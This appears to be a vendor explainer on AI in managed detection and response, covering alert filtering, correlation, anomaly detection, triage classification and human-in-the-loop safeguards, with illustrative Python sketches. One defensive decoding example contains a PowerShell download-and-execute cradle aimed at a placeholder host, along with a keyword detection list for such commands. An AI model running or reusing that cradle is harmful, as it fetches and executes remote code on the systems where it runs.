

AI in MDR does three main things: filters massive volumes of security events to eliminate noise (reducing millions of events to hundreds of actionable alerts), enriches alerts with contextual information so analysts can make faster decisions, and automates repetitive investigative tasks like decoding obfuscated scripts or gathering user behavior patterns.

The best MDR providers use AI to augment human analysts rather than replace them: machines handle brute-force data processing and pattern recognition at scale, while experienced security professionals apply the judgment, critical thinking, and strategic decision-making that artificial intelligence cannot replicate. This human-AI collaboration enables leading providers to achieve response times under 20 minutes while maintaining high detection accuracy and low false positive rates.

Does MDR use artificial intelligence?

Yes, modern managed detection and response services rely heavily on artificial intelligence and machine learning, but not in the way many assume. AI in MDR isn’t about replacing security analysts—it’s about empowering them to work faster and more effectively by automating the grunt work that leads to burnout.

The challenge MDR providers face is staggering volume. Organizations generate billions of security events, and trying to manually analyze even a fraction of them is impossible. As one customer describes it, “Out of a million events, I would say 99.5% of them are filtered out in triage by AI and machine learning before we actually need to have eyes on the actual issue.”

AI serves several critical functions in MDR operations. Machine learning models trained on billions of data points from real-world incidents correlate data across your EDR, cloud, and identity systems to find the handful of threats that truly matter. Behavioral analytics identify patterns and anomalies that deviate from normal activity, flagging suspicious behavior that might indicate compromise. Automated triage processes millions of security events to surface only high-fidelity alerts requiring human investigation.

However, the way AI is deployed makes all the difference. Some MDR providers use AI primarily to improve their own efficiency—scaling their SOCs, boosting analyst productivity, and cutting their costs while customers get the same service, maybe slightly faster. Leading providers focus on customer outcomes, using AI to make customers safer rather than just making operations cheaper.

At Expel, AI and automation built into Expel Workbench™ handle repetitive, high-volume tasks while human analysts focus on complex investigations requiring judgment and critical thinking. This partnership approach recognizes AI excels at certain tasks while humans excel at others—and optimal security operations leverage both.

How does AI help with threat detection?

AI transforms threat detection by processing data at scales and speeds impossible for human analysts while identifying patterns across massive datasets to reveal sophisticated attacks.

Pattern recognition at scale represents one of AI’s most powerful threat detection capabilities. Machine learning algorithms analyze network traffic, system logs, and user behavior to identify behavioral patterns deviating from normal activities. By continuously learning what “normal” looks like in your environment, AI can spot subtle anomalies that might indicate compromise—like unusual authentication patterns, abnormal data access, or suspicious process execution.

Correlation across disparate systems allows AI to connect dots human analysts might miss. Rather than examining alerts from individual security tools in isolation, AI-powered correlation engines analyze signals across your entire technology stack—endpoints, cloud platforms, identity systems, network devices—to identify attack patterns spanning multiple systems. An isolated suspicious login might seem benign, but when correlated with unusual cloud API calls and abnormal file access, it reveals a coordinated attack.
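
To make the correlation idea concrete, here is a minimal Python sketch. It is not Expel's implementation: the signal fields, the 30-minute window, and the `correlate` helper are all assumptions chosen for illustration. It groups signals by user and flags any user whose activity spans several tools within a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical normalized signals from different tools; field names are illustrative.
SIGNALS = [
    {"user": "alice", "source": "identity", "type": "suspicious_login",
     "time": datetime(2024, 1, 1, 9, 0)},
    {"user": "alice", "source": "cloud", "type": "unusual_api_call",
     "time": datetime(2024, 1, 1, 9, 10)},
    {"user": "alice", "source": "endpoint", "type": "abnormal_file_access",
     "time": datetime(2024, 1, 1, 9, 20)},
    {"user": "bob", "source": "identity", "type": "suspicious_login",
     "time": datetime(2024, 1, 1, 9, 5)},
]

def correlate(signals, window=timedelta(minutes=30), min_sources=2):
    """Return users whose signals come from at least `min_sources`
    distinct sources within a single time window."""
    by_user = defaultdict(list)
    for signal in signals:
        by_user[signal["user"]].append(signal)

    flagged = {}
    for user, items in by_user.items():
        items.sort(key=lambda s: s["time"])
        # Try each signal as the start of a window and collect what follows it.
        for i, start in enumerate(items):
            in_window = [s for s in items[i:] if s["time"] - start["time"] <= window]
            sources = {s["source"] for s in in_window}
            if len(sources) >= min_sources:
                flagged[user] = sorted(sources)
                break
    return flagged

print(correlate(SIGNALS))  # {'alice': ['cloud', 'endpoint', 'identity']}
```

In this toy data, the lone login for `bob` stays below the threshold, while the three related signals for `alice` surface together as one finding.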

Anomaly detection identifies threats that don’t match known attack signatures. Traditional signature-based detection fails against novel attacks, but AI systems can recognize when behavior deviates significantly from established baselines. This capability proves particularly valuable for detecting previously unknown threats by identifying behavioral patterns indicating malicious intent even when specific indicators are new.
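
As a rough illustration of baseline-driven anomaly detection, the sketch below uses a simple z-score test. Production systems use far richer models; the threshold of three standard deviations, the `is_anomalous` helper, and the sample counts are assumptions made for this example.

```python
from statistics import mean, stdev

def is_anomalous(history, observed, threshold=3.0):
    """Flag `observed` when it lies more than `threshold` standard
    deviations away from the mean of the historical baseline."""
    if len(history) < 2:
        return False  # not enough data to establish a baseline
    mu = mean(history)
    sigma = stdev(history)
    if sigma == 0:
        return observed != mu  # perfectly flat baseline: any change stands out
    return abs(observed - mu) / sigma > threshold

# Hypothetical daily counts of files accessed by one user.
baseline = [40, 42, 38, 45, 41, 39, 43]
print(is_anomalous(baseline, 44))   # False: within normal variation
print(is_anomalous(baseline, 400))  # True: far outside the baseline
```

No signature is involved here: the second value is flagged purely because it deviates from what this user normally does.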

Alert enrichment and prioritization help analysts understand which threats matter most. When an alert fires, AI automatically enriches it with context: Have we seen this before? What does this user normally do? Is this activity consistent with their role? AI can automatically decode suspicious PowerShell scripts and cross-reference them with the MITRE ATT&CK framework, providing analysts with immediate context for decision-making.
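
The script-decoding step can be sketched in a few lines of Python. PowerShell's `-EncodedCommand` argument is Base64 over UTF-16LE text, so decoding it is mechanical. The keyword-to-technique table and the `tag_techniques` helper below are hypothetical and deliberately tiny; real enrichment would rely on much more robust parsing.

```python
import base64

def decode_encoded_command(b64_text):
    """Decode the argument of PowerShell's -EncodedCommand,
    which is Base64 over UTF-16LE text."""
    return base64.b64decode(b64_text).decode("utf-16-le")

# Hypothetical keyword hints mapped to MITRE ATT&CK technique IDs.
TECHNIQUE_HINTS = {
    "downloadstring": "T1105",       # Ingress Tool Transfer
    "iex ": "T1059.001",             # Command and Scripting Interpreter: PowerShell
    "invoke-expression": "T1059.001",
}

def tag_techniques(script):
    """Return the sorted technique IDs whose keyword appears in the script."""
    lowered = script.lower()
    return sorted({tid for keyword, tid in TECHNIQUE_HINTS.items() if keyword in lowered})

# Build a sample encoded command so the example is self-contained.
original = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
sample = base64.b64encode(original.encode("utf-16-le")).decode("ascii")

decoded = decode_encoded_command(sample)
print(decoded)
print(tag_techniques(decoded))  # ['T1059.001', 'T1105']
```

The analyst receives the readable command and candidate technique tags instead of an opaque Base64 string.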



Expel’s automation engine, Ruxie, adds context to 95-97% of alerts for analysts and handles 30-40% of investigations end-to-end with analysts providing review. This doesn’t mean AI is making final security decisions—it means AI does the heavy lifting of data gathering and initial analysis, then presents findings to human analysts who make the ultimate call.

AI vs. human security analysts

The relationship between AI and human security analysts isn’t adversarial—it’s collaborative. Each brings distinct strengths to security operations, and the most effective MDR services optimize the partnership between them.

What AI does better than humans:

Processing massive data volumes at speed. AI can analyze billions of events in seconds—something no human team could accomplish. For one Fortune 50 company, AI turned 15 billion raw events over five weeks into just 35 investigations. For another customer, AI filtered two million alerts down to 114 actionable findings.

Executing repetitive tasks consistently. Manual data gathering—looking up IP addresses, checking domain reputations, retrieving user authentication history, decoding obfuscated scripts—represents soul-crushing work that leads to analyst burnout. AI handles these repetitive investigative steps instantly and consistently, freeing analysts to focus on complex analysis.

Maintaining 24×7 vigilance without fatigue. AI doesn’t get tired, doesn’t need breaks, and maintains consistent performance around the clock. This constant monitoring complements human analysts who work in shifts and need sustainable workloads to avoid burnout.

Recognizing patterns across environments. AI trained on data from hundreds of customer environments recognizes attack patterns and similarities between alerts individual analysts might not have seen before. When AI encounters similar activity across multiple customers, it can surface this collective knowledge to inform triage decisions.

What humans do better than AI:

Making nuanced judgment calls. Security incidents require understanding business context, evaluating broader implications, and making strategic decisions about investigation priorities and response strategies. Is this unusual PowerShell execution from your sysadmin’s weekly maintenance script or an attacker? AI can flag it as suspicious, but experienced analysts determine the answer by understanding your environment.

Adapting to novel attack techniques. When attackers use new tactics that deviate from known patterns, human analysts recognize the threat even without historical training data. Critical thinking and creativity allow analysts to hypothesize about attacker behavior and investigate accordingly.

Understanding organizational context. Effective security response requires knowing what’s normal for your specific business. Does your finance team regularly access large datasets at month-end? Do developers routinely use administrative privileges? Human analysts learn these organizational nuances AI struggles to fully capture.

Communicating with stakeholders. When incidents occur, explaining what happened, why it matters, and what to do about it requires human communication skills. AI can summarize findings, but analysts craft incident reports that resonate with both technical and executive audiences.

The optimal model combines these strengths. As Expel demonstrates, AI handles brute-force data processing while analysts apply their expertise to critical decisions: Is this a threat, and what do we do about it?

Machine learning in MDR

Machine learning forms the foundation of effective AI implementation in managed detection and response, enabling systems to improve over time through exposure to real-world security data.

Classification models for alert triage help prioritize which alerts need immediate attention. Expel uses decision tree-based classification models trained on past analyst triage decisions to predict the likelihood that specific alert types are malicious. These models analyze multiple pieces of information to provide an additional layer of initial triage—think of it as having a seasoned investigator offer immediate guidance.

The system classifies alerts into categories: malicious (strong indicators of genuine threat), suspicious (behavior leaning toward malicious but not definitive), likely benign (appears safe but flagged for quick review), and benign (clear signals of normal behavior). For every classification, the system provides feature importance—highlighting the top evidence driving the decision, like “Anomalous ISP” combined with “First-time Geo-location for User.”
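
A minimal sketch of how a model score could map onto these four categories, with the top evidence surfaced alongside it, might look like the following. The score thresholds, the contribution values, and the `classify` helper are assumptions for illustration; the source does not state the actual cutoffs or how feature importance is computed.

```python
def classify(score, contributions, top_n=2):
    """Bucket a malicious-likelihood score (0.0 to 1.0) into a triage
    category and return the features that contributed most to it.

    The thresholds are illustrative, not values from any real system.
    """
    if score >= 0.9:
        label = "malicious"
    elif score >= 0.6:
        label = "suspicious"
    elif score >= 0.2:
        label = "likely benign"
    else:
        label = "benign"

    # Rank features by the magnitude of their contribution to the score.
    top_evidence = sorted(
        contributions, key=lambda name: abs(contributions[name]), reverse=True
    )[:top_n]
    return label, top_evidence

# Hypothetical per-feature contributions for a single login alert.
evidence = {
    "Anomalous ISP": 0.41,
    "First-time Geo-location for User": 0.35,
    "Known device": -0.08,
}
print(classify(0.72, evidence))
# ('suspicious', ['Anomalous ISP', 'First-time Geo-location for User'])
```

Returning the evidence with the label keeps the decision explainable: the analyst sees why the alert landed in a category, not just which one.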

Continuous learning from analyst feedback ensures models improve over time. Every decision analysts make about alerts—moving to investigation, closing as false positive, or declaring true positive—is recorded and feeds back into machine learning models. This creates a feedback loop where expert human decisions continuously refine AI accuracy.

Similarity detection helps analysts leverage collective knowledge. AI compares current alerts to past activity, surfacing relevant historical context during triage and recommending actions based on decisions made for similar alerts previously. When analysts see hundreds of suspicious login alerts weekly, AI recognizes common patterns and provides situational awareness about how similar activity was handled.
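
One simple way to picture similarity detection is Jaccard similarity over alert attributes, sketched below. This is a stand-in technique, not necessarily what any provider uses; the attribute names, the 0.35 threshold, and the `similar_decisions` helper are hypothetical.

```python
from collections import Counter

def jaccard(a, b):
    """Jaccard similarity: size of the intersection divided by size of the union."""
    a, b = set(a), set(b)
    union = a | b
    return len(a & b) / len(union) if union else 0.0

# Hypothetical past alerts as (attributes, analyst decision) pairs.
PAST = [
    ({"suspicious_login", "vpn", "new_device"}, "closed_benign"),
    ({"suspicious_login", "vpn", "known_device"}, "closed_benign"),
    ({"suspicious_login", "tor_exit", "new_device", "mfa_fail"}, "investigated"),
]

def similar_decisions(alert, history, min_similarity=0.35):
    """Count the analyst decisions made on past alerts that resemble `alert`."""
    return Counter(
        decision
        for attributes, decision in history
        if jaccard(alert, attributes) >= min_similarity
    )

current = {"suspicious_login", "vpn", "new_device", "off_hours"}
print(similar_decisions(current, PAST))  # Counter({'closed_benign': 2})
```

The counts give the analyst situational awareness about how comparable activity was handled, while the decision itself stays with the human.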

Automated investigations for specific scenarios handle routine cases end-to-end. For certain alert types with clear investigation patterns, AI can complete entire investigations with analysts providing final review. This automation saves significant time while maintaining quality through human oversight.

However, crucial safeguards prevent blind automation. Even when AI classifies alerts as benign, random subsets are routed to analysts for quality assurance, and protective guardrails ensure certain high-impact alerts always receive human review regardless of AI classification.
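
These safeguards can be sketched as a small routing function. The alert types, the 5% sample rate, and the `route` helper are assumptions made for illustration, not details from the source.

```python
import random

# Hypothetical alert types that must always reach a human.
HIGH_IMPACT_TYPES = {"ransomware_behavior", "domain_admin_change"}

def route(alert, qa_sample_rate=0.05, rng=random):
    """Decide where an AI-classified alert goes next."""
    if alert["type"] in HIGH_IMPACT_TYPES:
        return "human_review"   # guardrail: AI classification is ignored
    if alert["ai_label"] != "benign":
        return "human_review"   # anything not clearly benign gets analyst eyes
    if rng.random() < qa_sample_rate:
        return "qa_sample"      # random subset of benign alerts is spot-checked
    return "auto_close"

print(route({"type": "domain_admin_change", "ai_label": "benign"}))  # human_review
print(route({"type": "suspicious_login", "ai_label": "suspicious"}))  # human_review
```

Checking the guardrail first means a high-impact alert reaches an analyst even when the model is confident it is benign.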

AI-powered threat detection

AI-powered threat detection in MDR combines multiple technologies and approaches to identify threats across the complete attack lifecycle, from initial compromise through data exfiltration.

Multi-stage detection coverage addresses different attack phases. AI models focus on post-exploitation activity with the highest likelihood of representing active, post-compromise attacks. Rather than alerting on every possible suspicious signal, AI prioritizes detections based on where they fall in the MITRE ATT&CK framework, focusing on tactics like credential access, lateral movement, and data exfiltration, where attackers have already gained a foothold.

Context-aware threat intelligence improves detection precision. AI systems incorporate threat intelligence from multiple sources (the provider’s global customer network, external threat feeds, and security research) to recognize emerging attack patterns. When a novel technique appears at one customer, AI models can immediately apply that knowledge across the entire customer base.

Environmental learning allows AI to distinguish between suspicious activity and normal business operations. AI learns what “normal” looks like for your specific environment—understanding user behaviors, typical application usage, expected network patterns—so it can identify meaningful deviations. This context-aware approach dramatically reduces false positives compared to generic detection rules.

Automated evidence collection accelerates investigations. When analysts need to understand alert context, AI automatically executes investigative actions—querying security tool APIs to acquire and format additional data. Rather than manually pivoting between multiple consoles to gather information, analysts receive pre-enriched alerts with relevant context already assembled.

The combination of these AI capabilities enables dramatic noise reduction. Talk is cheap, but results speak: for one organization, AI turned 15 billion raw events into just 35 investigations requiring human attention. This filtering allows analysts to focus on genuine threats rather than drowning in false positives.

Frequently asked questions

Can AI replace security analysts? No—and organizations claiming otherwise are misleading customers. AI excels at repetitive, high-volume tasks while humans excel at judgment, critical thinking, and making tough calls. The entire philosophy behind effective AI in MDR is optimizing the partnership between machines and humans, not replacement. AI automates soul-crushing manual data gathering that leads to burnout, allowing analysts to apply their expertise to critical decisions. Security incidents require understanding business context, evaluating broader implications, and making strategic decisions AI cannot replicate.

What can AI do that humans can’t in threat detection? AI can process billions of security events in seconds—something no human team could accomplish. It can maintain perfect consistency executing predefined tasks, work 24×7 without fatigue, and recognize patterns across hundreds of customer environments simultaneously. AI trained on massive datasets identifies correlations and similarities individual analysts might never encounter. For data processing, pattern recognition at scale, and consistent execution of routine tasks, AI significantly outperforms humans.

What do humans do that AI can’t in security operations? Humans make nuanced judgment calls considering business context, organizational priorities, and situational factors AI cannot fully evaluate. Analysts adapt to novel attack techniques that deviate from known patterns, hypothesize about attacker behavior, and investigate accordingly. They communicate findings effectively to technical and executive stakeholders, understand organizational context to determine what’s “normal” for your specific business, and make strategic decisions about response priorities and investigation depth. The collaboration, creativity, and contextual understanding humans bring remain irreplaceable in security operations.

Is AI MDR better than traditional MDR? The question isn’t whether AI is present—virtually all modern MDR services use some form of automation and machine learning—but rather how AI is deployed. Leading MDR providers use AI to augment human expertise through data enrichment and decision support, not just to automate triage at the end of the process. The best approach focuses AI on both enrichment (providing context) and triage (reducing noise), addressing the complete alert lifecycle. Organizations should evaluate MDR providers based on outcomes—MTTR, false positive rates, detection coverage—rather than AI marketing claims.

How accurate is AI threat detection? Accuracy depends entirely on implementation approach and human oversight. AI classification models at leading providers achieve high accuracy through training on billions of real-world data points, continuous refinement based on analyst feedback, and protective guardrails ensuring certain high-impact alerts always receive human review. Even highly accurate AI isn’t 100% perfect, which is why the best MDR services maintain human-in-the-loop oversight. AI provides initial assessment and evidence, but analysts make final decisions. Organizations should ask providers about their false positive rates (leading providers achieve below 10%) and how they validate AI accuracy over time.